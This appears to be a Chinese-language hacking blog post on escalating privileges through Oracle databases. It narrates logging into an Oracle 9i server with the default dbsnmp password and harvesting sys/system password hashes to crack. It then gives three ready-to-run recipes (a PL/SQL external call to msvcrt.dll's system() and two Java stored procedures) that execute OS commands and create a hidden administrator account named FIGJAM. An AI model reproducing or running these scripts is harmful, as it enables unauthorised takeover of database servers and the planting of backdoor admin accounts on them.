ORACLE通过PL-SQL执行命令-需要开放端口及权限

previous page next page
set current_listener IP连了一下,用version命令看了一下<是oracle 9i>,  看了一下服务,没有验证,直接拿到服务名,打开SQLPlus,敲入 connect dbsnmp/dbsnmp@服务名连接,用select distinct a.name from sys.user$ a,sys.sysauth$ b where a.user#=b.grantee# and b.privilege#=4;看了一下DBA<帐户密码一样>,这样就可以通过ORACLE来执行OS命令<对于dbsnmp账户,oracle 9i安装时是不提示修改默认密码的,虽然不是DBA,但却可以通过它看道很多要命的信息,sys,system的hash可以轻松得到,这样随便找个彩虹表,很快就可以搞定hash,进而拿下最高权限!>

利用oracle提权,总的来说,常用的有这几种方法:

1.通过PL/SQL运行OS命令

  1. CREATE OR REPLACE LIBRARY 
  2. exec_shell AS 'c:/windows/system32/msvcrt.dll';
  3. /
  4. CREATE OR REPLACE PACKAGE oracmd IS PROCEDURE exec(cmdstring IN CHAR);
  5. end oracmd;
  6. /
  7. CREATE OR REPLACE PACKAGE BODY oracmd IS 
  8. PROCEDURE exec(cmdstring IN CHAR)
  9. IS EXTERNAL 
  10. NAME "system" 
  11. LIBRARY exec_shell
  12. LANGUAGE C;
  13. end oracmd;
  14. /
  15. exec oracmd.exec('net user FIGJAM 123 /add');
  16. exec oracmd.exec('net localgroup administrators FIGJAM /add');

2.通过Java运行OS命令

  1. CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
  2. import java.lang.*;
  3. import java.io.*;
  4. public class JAVACMD
  5. {
  6. public static void execCommand (String command) throws IOException
  7. {
  8. Runtime.getRuntime().exec(command);
  9. }
  10. };
  11. /
  12. CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
  13. AS LANGUAGE JAVA
  14. NAME 'JAVACMD.execCommand (java.lang.String)';
  15. /
  16. exec javacmdproc('cmd.exe /c net user FIGJAM 123 /add');
  17. exec javacmdproc('cmd.exe /c net localgroup administrators FIGJAM /add');

3.Java提权

  1. create or replace and compile
  2. java source named "Util"
  3. as
  4. import java.io.*;
  5. import java.lang.*; 
  6. public class Util extends Object
  7. {
  8. public static int RunThis(String args)
  9. {
  10. Runtime rt = Runtime.getRuntime();
  11. int rc = -1; 
  12. try
  13. {
  14. Process p = rt.exec(args);
  15. int bufSize = 4096;
  16. BufferedInputStream bis =
  17. new BufferedInputStream(p.getInputStream(), bufSize);
  18. int len;
  19. byte buffer[] = new byte[bufSize];
  20. // Echo back what the program spit out
  21. while ((len = bis.read(buffer, 0, bufSize)) != -1)
  22. System.out.write(buffer, 0, len); 
  23. rc = p.waitFor();
  24. }
  25. catch (Exception e)
  26. {
  27. e.printStackTrace();
  28. rc = -1;
  29. }
  30. finally
  31. {
  32. return rc;
  33. }
  34. }
  35. }
  36. /
  37. create or replace
  38. function RUN_CMD(p_cmd in varchar2) return number
  39. as
  40. language java
  41. name 'Util.RunThis(java.lang.String) return integer';
  42. /
  43. create or replace procedure RC(p_cmd in varchar2)
  44. as
  45. x number;
  46. begin
  47. x := run_cmd(p_cmd);
  48. end;
  49. /
  50. variable x number;
  51. set serveroutput on
  52. exec dbms_java.set_output(100000);
  53. grant javasyspriv to 用户名
  54. /
  55. exec :x := RUN_CMD('net user FIGJAM /add');
  56. exec :x := RUN_CMD('net localgroup administrators FIGJAM /add');


 
previous page start next page